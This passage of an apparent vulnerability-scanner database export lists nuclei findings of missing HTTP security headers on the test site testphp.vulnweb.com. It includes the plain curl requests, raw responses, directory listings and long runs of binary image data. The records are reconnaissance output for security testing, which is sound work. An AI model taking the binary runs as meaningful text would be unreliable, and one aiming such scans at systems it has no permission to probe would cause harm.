*��d1��\u0014c<\u001f�q����j���Im$��:\u000f0\u0014V_Ab\u0007��\u0004\u0015*W$����Z����;M\u0006�SYLRYrʌ]��\u0014\u000e\u0007��\u00198�\t�lU�ÿ\u0013���d�\u0013ej���e���\u001f��\u0018e*�6{z\u0018}�\u000e\u001d\u001d3U\n%j_-��G�4�2����������1��bIc�f\u0001ܣ%\u001aA�'�RN\u0014\n�b>ߤ���>Z2�g\b��r��r\n�#���-N���\t�l�2�BF\u000f�\u0011�E}i��'��ܬ2yh��lM����@?�\u000f\u001d��)O�\u0012�"4��\u0017\u000b4A�ӆ(�N@e$0\u0007\u0003 \u0010Goj4�b��W\u0002\t1�g<q��?\u000b�1���N\u0013��X���8\u000e��1\u001a�\u0007�rs��J�4{�{eNy��l���N�'\r��ڟ%��9?�\\H��樑d\u000e�y�vc\u0018�l\u001eC\f��c?��u\u0017�:�\u0018\u0015 ���9\u0007����E��h�f��N�? g�##>٩v�)q\n�\u0013\u0006\f��\u001d�����9+������5�أ%��}�\u0018x݁uw<r2�y�\u0019�܏bI0z�N�R���h�{gc�G*���F\u0018!�\u000er;\f��o�!�X���v��\u0003\u0003;� d�H'\u0007��y\u0014Yb����/\u001f���\u0016����Bj:O^����ks~��e��\u000b��\f7#�\u0001�Or\u0006\u0001\f=��ֽ\u0019��eݬ\u001a�������Ȍ\u001d\u001cP\f?�O\u0004w\u0007�A=ܶV�k�$� ���Ci+\u0016$$�\u0017�9>�\u0019\u001c\f2ջ�.���Γ�ѵ+cotS̷�\u001b\\E0�\n�3�0r\u0001*���6�j��\\m��\u001e�����^zd����Vs�x[��e��uu�I�m8o�t�\u0018���\t�̀\u001eX\f.\u0018\u001c\u0015l`ղ���Y�I�\n�.<�R� ���+$鞮�zz�h�Xs�E��S\u00122G>�c��t��\u0011�ĖP���&˩�M\u0014��w<�����,\t�>�P)�j7:N�\r唅'��\u0003�~��j\u0015)ZMa��:��z�\u0014�i.\r�0��b�6�.~�\u0012I��Ͼs���������[�V\r���˒�\u0016%s�<���5����\\�G�7NH��w���<Ռ>F@,�w\u0003�s�9"�����=jd&W��ԏ1�m��ڟ@��ܱ��\u0005�4��l�Q�K)�|c�:TNV�&f):��\f9��\u0003������\u000f|��H��Kx�9�Ya�\f�T��.J��]�%�w�|�&0�w\u0003�\u000foҲ�\u000eܢ�c�a�\\SP��\u0011$2��7\u001b��|~+\u001b��[[����0$�ô\u0010s�~y�g�����-/��_4D�ޑ���9��@\u001f#��S5m@\\�\u001e�0ϸ�2��($��}���N\u001a\u0019S-�c��62�5�V�t���VR�\u0019�~�F\b �`�Ի=v���V2<�\u0002�bA��1' �3ܑ�yƓ��R�U�\u001d��\u0018�E��9ܟ�\u0003۱����T=T�ƭ��RyU7�*��\tu\u0005�G\u0003qQ���ƬˢO�e��\u0010���Q�:��5�s�F�l�\b#�\u000fЃ����ZMom��s2��}���`\u001229�\b�����#��{v�\u001c��V�\u0018u#��@��\\��_X��RА;\\+�Y�}\u0003��\u001c��+��*N���)���?an�W\u0013lx��/��\u0017���t�wD4N��I�\u001d���\u001d�@? v���r9��������ו���7%�9��5N�=?�ס��~Ne��\u001eX�)Wȅ)JR��\u0005)J��^ɧjVװ�2[Ȳ�e\f\t\u00078 �\b�\u0011��۾��P�M�Fb�H��\u000b�\\+/\u0003�\u000e\t�\u0013���j�tް�,��k\u0015t{kv-\u0018 �\\�\u0006�\u0012H�&���\u0004un2���znu��}#]\u000f:��=9a�~ď�\u001a��j�V���ʪ\u00103��\u0006I\u001e��{r\u0007\u0015�4\u001dXKio{lΚh��)%\u001e�\u0018��\u001d�\u001c\u0015��c���\u001da\u0016�u\u0004s�C\u0018\u000b$C'w�\u0004��n\r��������\u0014]��G,�u7_ZOc\u0006�\u0010H�l����� s��\u001fp\u0006@'�����K4\u0010�{\u0015IJ@]�\u0016m\ny�8\u0018���\u001a�ɼ�.n��3J�\u0015��I��Q���#�Ը�り�Y�z�\u000b���}F�\u0012\u001a7��ubC����x8��8�Z.���v�����[\u001fO�I\f��F�� �#�\u0013�V�U�\b��cn\b���rX��e��|�=��A�(PB��m\\\u001eG\n���'V��\rA�Mf���w�!*�����[�QU����\u0016\u0007J�K�JR�\u0018)JP\u0002��)JP\u0002��)JP\u0006ᖳq��]?%�\ry����� �\b�;f����f��ۉ�\n�Y��4���X�Q�N�$��iJ�\u0018�s��Hߤ�Ҕ�$b��)JP\u0002����", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 963, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests", + "discovered_date": "2024-11-13T02:42:37.490Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:27 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/</h1><hr><pre><a href="../">../</a>\r\n<a href="pmwiki_2_1_19/">pmwiki_2_1_19/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 964, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19", + "discovered_date": "2024-11-13T02:42:37.774Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests/pmwiki_2_1_19 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/pmwiki_2_1_19/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/pmwiki_2_1_19/</h1><hr><pre><a href="../">../</a>\r\n<a href="scripts/">scripts/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 965, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/4.jpg.tn", + "discovered_date": "2024-11-13T02:42:38.107Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/4.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4615\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:58 GMT\r\nEtag: "4dca64a1-1207"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0002\u0003\u0001\u0001\u0001\u0001\u0004\u0005\u0003\u0006\u0002\u0001\u0007\b��5\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0005\u0002\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0004\u0012!\u00051A\u0013Q\u0006"aq�\u0014�#2B��R��%3���b��\u001a\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0002\u0005\u0004\u0006��0\u0011\u0002\u0002\u0001\u0003\u0001\u0006\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0012!1A\u0004\u0013"2Qq\u0005a���3��\u0014#Rb����\f\u0003\u0001\u0002\u0011\u0003\u0011?K4�5���\u001d�Ô\u0012I�?�#Y6��^�s`\u001f��# 2�#Ag��&V\u0016\u000f���:����'���02t��>\u001cnX3P�W��s��D�-���#�&8�3���q�\u0011�A�4\t�����0+���F�!�4�"��#�)c�\u0002�\u001b�zTZ��Wo\u0015�<s\r��\u00159D��&�\tRտ��\u000b�kZ$�������Z��>�{�rB�2�]�U]�wy \u001f\u001d���\u0010~�\r\u0006�K��ۊ�k�~����8\u000f��~fI\t\u001b�\u0015D\u001e���\u001d<�+\u0014(�v\u0002�j\u0003�?(Xi�|��RZ\u001e�C��o�.\u001e)w ! 3n\u000b�\u0013E���agU˔#BX�\u0002����=M���\u001a�}�\u0006�\u0002�=��\u001c��ca̭I���!�\u0003�N�Y�\u0019�0UdK��\b'��U����m��^>�Q��\u0012*��Q�\u000f\u001ac\u001c�\u0005�F���*�\\�4����ՆP\u0007<~t��U\u0014�2�<�gz��\u000f$Y���e�\u0006�?3\u0003�\n<v���X\u000e`U,p&�7�C\u0017�cW\u0006hP3/��[=�?�f\u001aL���"��ʑ��r�,�\u0015�*�\b.�"�$�\u0016{�\u0018="l����v��l�<�U#��I�r�x��ֶ�/�A�\u0015�C� BĒhj�-�g����\u0007�Г4���CL�\u0018\b��(�h�\u000by\u001c�B�\u0017�f&<pƱ�\u001a�(��(\u0001�5\\*\u0005\n�q�:��\u001bE\u0016&\\�����Q�\u0013�utg��}����\u0003��\u0019?��\t\u0014��@�\u001e,�����鼓n]/���U܄���Z\u0007��:[�ԃdK\u0004��e'bHl���s]������:\u000e�\u001c�ގ�9�?��U\u0010�)���:�\u0003+P\u0004��aF�X�<\u001b≩��0A��\u0003��X]O!�\u001a\u0003���A�H����6���{\u001f�T6�Ǭgvl�\u001e�[���X\u001c����\u0007=���o�M��/}f����W�\bn��8���\u0016"I�/A\u001b\u0005�������<��uy"R�ŀ���������\n\u001cԺ�t���,孨\u0011�P�A�\r��\u001a+3;ч��F;T{��[�����\u0016�V�6�uL��e��\nۈ,YX���?��N:.*b@����Q5}�������\u0007Ցi��}�������\n;��ד�h��/�Ӂ���9hw\u001f[���\\\\92_w��\u0010��\u0018�\u000b��\u001f�'��w3��8\u0001Yop\u0006ڂ�l�+C���:��r�t`zLV�A�|\u001f�\u0003��\u0002;\u0017�D�mm���\f̾���@�B7)��2�H��Ǜ�\\\u0011VF�};�'��L*@ۈV4O�ߑu��p1��ُ\u0018E�hw>��?]<��\u001fM\u0010�L�f�Sa\fƌ\n}t|_���15F����\u000e�\u0015\u000fSD\u001d^�\\��\t(\u001cX�j�:�:�\f�\u0018�y\u0007]�\u001fm#��`��S#*\b�@f\u000e�\u0015_sΪ\u001dy^L��\t�1Ŵ���k�7|7\u0015|}E���#3�#29�r8`{Q�΢\u000f�!�F$e۸�\u0018Ճ��<w\u0014k��uFN\u0013㱓\r�Ѱ��\u001d��·l�U&�r=��GϿ���ͦ�4�:�9�C���O��\u0015Z\u0012|�\\�$�\u0016b\u0015bI \n\u001c���^uT��f!��!�V��Uoɮkށ5�\u001e�\t�W�3(,�~`�F������k,���o4��r80����3��7Uλ���\u0015\u0001��;�\u001et�ى�����\b>ڂ^E����M�����@\u001as�=ŘC�\u0001�(�p�˘ϐ���)��"�<�0�z�7ȡ����yI\u0004b��{��8c��s=%A�&h�u�-�\u0001���3��f�\u0011���k�#��\b\u001d�滊҈D��z��+���O��cP\u0007a�x\u001fm<3Y��g�%\u001b�������"a,�|���k\u001e\u0001�kM�\u0015h\u000eݴ�\u0019UG}^z�\u0011r�(\u001e�k���\u0014N&f���4p����`<��.\u000f�Rf\u000b\u001cr��LE��\u0004w�a�\u0013;�d�$X�\u0018�o�($���A\u001e���\\���t��[��q'P�\u0014/,����I�\u001a\u001e_�q��#74I`E-{�?��F�\u0011|?��\u001eJL\u0015\f��.@!d\u0003�\u0006���oO��me��t��1���8 �5�>��~u\u0001c�B�93����pS\u0019\b���\u0003nu䊢;P����S'&N��2"���\u0006W��G�<��\u0011‚ǎIZ�l?��\u000f\u001b\u0010�\u0005YV�c\fB�\u0015��\u001am�Ӡ�%H�DU�ÿ���\r$�dր�D��bu\u0003�,�2\u001c��匨X���!,�\u0018�\u0017d\u0011\\�\u001ac��\u001b����dIe�(\u001fP�IT�qUVŅ�<\u000f�:�E\n�8�H�x�Um+�\u0006֟���p�_P�'�#��\u001a\u0007*e�9\u0004r\u0015\u000e�[k0��}�P~�L�V'\u00042���<��A�v��H}x��\u0013_�����\u0019L�B��X��B\u0014\u0005RV@K\u0012�KpG�\u000bDrh��3ʞN�xZ�����\u0006��VyY�o�w\u0010\u0016��\u001a�\u0011L�"���\u0005\u0004�s��s�>�y�m6���8��K0�"X��[Q�\u0016\u000bE�$�#q�g�\u001ck±�Ħ�*�һ�\fy#m\u000e,7�6\u0001��}#�\u001c���,����U��6ڀ���FGs��8\u001bZ�Zڋ�t�\u0017�,�\u001a��z�Wj7���UR��s@�\u000e\u0015\u0012\f�A�j����\u0013,H;�%\n��\u0016,_o���^��]�0�G�6��\u0014�n�\u001d�:�*_\\��1y�|��\u0004aM�v�F�B�_j��(�\u0006��o^���\\\r�����23\u001e�e�\u001d\u0013p\u0004�\u0004�\u0007�<\u000f�\u001a�3�$\u0003���\u0007��m\u0005�\u001cKF�>羝c\u0015\u0015ڵ���'\u0013\u001e��v\\�� �͖�䊾�(�<��8}\u000e\u0012�g&m����#��\u001f�����u��4Ǒx�N\u0015/]�s��\u000e�ohN/O�y1!n9e��7�\u0018�(�\u0006�Ǖ}��a\f����\u0004��a\n\u0001㶎�@ \u001f���ƍ��\u0007Τ���\u0017�\u0010@�18��\u001d\u0017\u001bX\u001e�BH\\c������܂4B\u001e~�\\։\u0004��?MP��I\r��ݹ��z���I� wfc�\u0015\u0014Y��@{\u0001��4ר.Yp�4E\n#�V$|�\u001bo4l]\u001e;���̼KT2wT��\u0013�\u001b?1���\u001e\u0007�IuR<+7������!{\u0010O�\u0013\u000e�3Y\u0016D�cb\u0003�a[�\u0018X\u0006��\u0001�ڹ\u00122[a�\u0007������\u000e\\,eґAU!@�߸\u001c�7ި{k\u000f��}Y����٢�\f\u0018ϰ|\u000f��_\u000f┃\u001f�ފ%\rD_'r��\u0004W\u0017ߛ�1�\u001bu\u0015�̝�(��]�T\u0016�l��Ln��\u0015Wܒöc#v8�9m\\��\u001bQ�Bֈ�]��^�9\u0001�.ϕ���N�ş��ן���l�&����p72��ܮ\t\u001f�T��n;\\M\u0005&�er�\u0006�E�n�Q<v<X44:\u0002Ɖ�{��h�@G��U��Q���1�O�Y�u��0ر\u0016p7\u001d���^O���������^�WƂ�,�N�N��I�L�:�%\t��������d\t�\fL���P�\u001d\u0016\u001c�#\r1eC`m\u000bb��U���ǁE&&zez���\u0018(P�[�\u001b6�7F����p5~\u0014��\u0001FR=��|`\rk�T��e�h�>/�H�}Y\\��qH�G�\u0001~/p�o����&���\u001a)V4�\u0004J�\u000e��\u0018�E\n<��^�ֆ\b�\u0003�\u001d\f �����̯~O L�?W��#�VV�f�dJ2P;��;�U\n�Y���:�x\u001d>6�7�-��V2ށ,F�7\u000f��أ}�j#�R;\r\\�>\u0016]�1�p<��>�w��1\f\u001f\u0015��4%�\u001e�V(��捀A\u0006��{���\u001f�P�\u000e>T�\u0015�r\u0002:�b�\u00057`\u001e\t����ӡb��#GUz�\u000e�h\n\u0003m�\u0001�@d�\u001b�4\u00016��x�<J\u0002�c�)a`\u001a&�w��\t\u0001����~ M�n�u����3�{\u001a\u0004�{���Lq��,��\\�\t��SI�S{\u001b�G�\u000f���|;!�\u0010���&r.�*�T[\u000e~m�h_��F�\u001d\u0003��VwM��9�I�4��ƕ\u0003!<w#m��}��\u0016\u000eO"@�zϞ�<p#3��)=\\�\tP���[���0�!\f��#J״�`S�<|��W�1�ۜ�H",h*�:S)}��u�b�p����D#\u0001{�\u001a��B�\u0006�;��4X�\u000b~M\u0002k�\u000e�?O���6@BѻF�\u001c:�5`�D\u001a���m\u0005�\n�H��\u0003w\u0002�����bj\\�\u0007��t��]���x�Z3HСD%����T�\u0017B�\u001e��v��\u0002��[�B>cc�u�P�|���˃d����\u0015����\u0016@;\u001et���I q���\u001c|���J���CL��1�%@�B��\b\u0004�5�\u001b\u0017V<�8��#�Q\u001364�E#Fɹ\u0018���k\u000e<\u0010H#�$jΒޤ~���S�������Z�:\u000f\u001d'5����zs;�Ӥ��6�\r\u0015$i�⤠nE?q���sK\u0019h\u0018�( �5d]_﫺fw�L\u0019$�k�G�\\��ЧO��m�1�����\u000e��H���\n��x\u0004]�}���<���$0ώ��\u0010�B7314\u0015Tr����c�j���\u001aJ�]A\u0017tG�\u0007L����s�嶰g�8��W\u001f"F�\\\t\u0013�S��_c�:���GYy�\u0002z��\u0011;U���\u0001I��]�w�گ�d�t��Xs\u001d�fW��\u001c���x\u0004X�/�W����D\u0005\u0015�C7�U����p+β]\u001b�<l�}Rޒ\u000b�C]�\u0007����@�bN�"20e"�\u0006�\u001a� �\u0014�T��\u0011�>8�\b�����������Q��\u0010N�;�\u001a�b\u0007ƺQgV��^5�e�B\u0004��Ƞ\u001e5��$�Ա�؟I�\u0012\u0001�������u�_���\u001d��~�\u0018Ѫ��Ҝh���1�A\u0013�\u001bA�����/����_�U�cV��\u0007�m_�\u00188S�@����SSUn\u001b��p>Oβ�\u0001���3�\u000fU����\ba�\\��SSV>E�J�����,u\u0006���:�\u001cO\u0003�\u00048B������Ӝef}$�\u0006=e�\tf˗��Z�m���ε���\u001a��)�\u0010\\1a\u0002\u001f\u0012�;k��\u0018��\b�����ՌX�ez�\u0004\u0011u���������=F\u0006�,\u001d��\u0004�菅sr'N�,�10亠�Ty�ۏmMM$y�='[oW��3W��T��}'\u001f+$ ��$( p�{�5���ښ�a�r�&\u0018�ͫ�󩩮\u000ba\u0013��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 966, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/7.jpg.tn", + "discovered_date": "2024-11-13T02:42:38.416Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/7.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6458\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:21 GMT\r\nEtag: "4dca64a1-193a"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0004\u0005\u0007\u0003\u0001\b��6\u0010\u0002\u0001\u0003\u0003\u0003\u0002\u0004\u0005\u0002\u0007\u0003\u0001\u0002\u0003\u0004\u0005\u0011\u0012!\u0006\u00131"A\u00072Qa\u0014\u0015#q�B�3CR���������\u001b\u0001\u0003\u0003\u0001\u0001\u0004\u0005\u0006\u0001\u0003\u0007\u0002��0\u0011\u0001\u0003\u0003\u0002\u0004\u0003\b\u0003\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0011!1\u0012\u0013AQaq�\u0006\u0014"2�������\u0015B��\f\u0003\u0001\u0002\u0011\u0003\u0011?��I�KMc��������^�ܡ�y!�2��w\u0005c�ϓϑ�\u0019�|x�\u001bT]K=$4n�2�\u0014ʌb��\f�\u0018,1φ�G�Qz~��=t�W�\u0002\u001aF*�O0uw�G�����|��q�7<6nI��<��\u0012)]%?��@�\u000ez�q���\u0014\u0003�s�j~��E ����μ��\u0017�Rׄ�H�7Y_$�5��T��\u0018Bʤ���������}\u001d�&�#R���O�d>�� y�\u001c��\u0007VR\u001c�\u0001u�v�4*Q�\u0018�� ���ަ\u0003\n\u0014�;���\f�ppt5\\��a�l\u0006��:�L��\u00059\u0007$�5ǧ�3����i��vb`�J�d�\u000f��jNﶃ:B�u�)�2\u001fS;�\u0014�"�İ�\u0007r�\u0004K1\u0003h�\u0003:.W��Y���;�w\nCI9������\tϝ3w�H��D�p�f�y�\u000b\rp���\u00171�~\u000e7x϶uWCw�D�\u000b�\u0012E@�\u000e�\u0018\u0012FAR}���\u000f\u0007\u0004\u00105:V���r����0�ѐ7W\f��\u0017n04� o}r�N>��+\rb�':�6Ll\u0011��8lx�Bt���c+[����\u000fIt�j�Y!��!�^�qʑ�,{�疉q�_�����d\u0014��G$P��\n\u000eԳ��\r�R����<g\u001cx�]�H�\u001dT�J�VشQ��l�dd�\u0003$g*\b\u0004��:�r�\u001bg�M$�\u0004h����V�Km\u0018珮F�E\u001bc����\u0018�󟲧�Ϛ�\u001b �S�v�������\u000b�\u0012�\bc}�PHq��������KQ\u001cK�WD\\��8��\u000f�Ӭ��R��i�#U+:Y�JJ���2B��\fW ��A�q�\u0019�Ρy�i��;^\u0013�4�8\u001f}}a|\u0012�\\Zu���\u0015\u001eP���±�\u0004�\u0006�//_\f�OC��\u0014KP�Xa/�j�!F\u0007k8;�@%x$`�Rx�_U\n��b��I\u0005E\u001c��%1�8�;����`����\u0007:Ww��L��rF�P{;8�����u'���\\::�b\u00163G�B�!;Ӎ�\u001caW����<\u000fa�$�`s���+䦪Ji�\u0018\u0012Aߌ+.\u001d_��\u0005P��]X\u0001��6�Z�8�\u001eK�\u0018D\u0019c�\u0018\u001a�����k��[o4O\u0015nk[����}ƚ�}�7u�Ĵ3H��M�7q&��*����N\u0007��p�ա�w�q���~�\u0001�~���=��E�锳�|��Lnp�\\3$\u000e���1����\n��;�B����(b�G�8c�\u0001vg,Ac�\u0013$�\u0005�J^�^=����ϝ\nu+�QG:\u0019B\f\u001c�#��΄�`q\u0012��M�\u0013[[�C�x�]��\u00158�4F:s\u0013"���RRT�y ���|���R�3��\u0002��ܮ}\u0011=ʎ\u0016���(bhi`H�\u0011\u0005";\u0011F�I�\n�?0b��:z�=L�4ҁ�\b�\u0001G\u0007�}������<���\u001c`t�?�8�X\u001bN�$/�[Vt�<\u001c���imS�@er�C\f\u0011�\fu\u0005������B��v�C�8� �8� ��D��uC�Z�H�s\t��Ͼ|\u0018�>O�\b\u001e��� ��\u0016�\u001d\u001c�!�>(*�Vl�PϲX�gqHӘ�]��\t\f��6L\u001cn8q.\u0015A\u0018!���5����'���\u0013�\u0016\u0013\u0006\u0014�9`�\u0005\b;9\u0007$�\u0003�hJ��ӳ�I�u=]\u0015X\u0002�\f�\u000b�'�T�_<����\u0001l��̴\u00157\u001b|�!�Id�\u0015-\u0018��w+6_�\u000b����|���jJ:��r�,\f���L\u001d�����5\u0015%W\r�\u0013��p5$�\u0016�iHऎ\u0018c\u0011"q�\fs�~�\u001f�����{�(\n1��7\u001c}��mH�ީ�\u000f�2f�i=��L�������a���2F�\f$esɩ�yt�\u0007����w\u001d7��\u0003g��':ނ�Ls�Uq\t#`@ �}KsƸK�5�j\u0016��i�@�].\u0004sȒƵ\u0012\f���퐟�p��\u0004����d\u0012\u0015��*�t�U�Lf�a\u0006A\u0002\u0017S\u001b�;�������\f0q�\u0005�u���_P6ᐰ#�\n��\u0011�\b��\u0013[)�p����KOz��r��\u0006p�$���r��[y��M;\u001ao�4���!f, /�ع^\u0010�`�\u0005\u0001ƢuM/P��%���L��1H���e�5��&с�(]��!G\u0003R:�\u0014J\t��4��e�y���%�\u000e���|g\u0019�\u0001$�~f�=Uj�u\u0015�Jj��AQG:�-c���������\u000eq��#��ˑ����~r0s��˷n�����l�s1���GIw�\u0012CW\u0004���v�s�G\u001c\u00022\u000e\b������sQQ\f��\u001dE-<2"��� 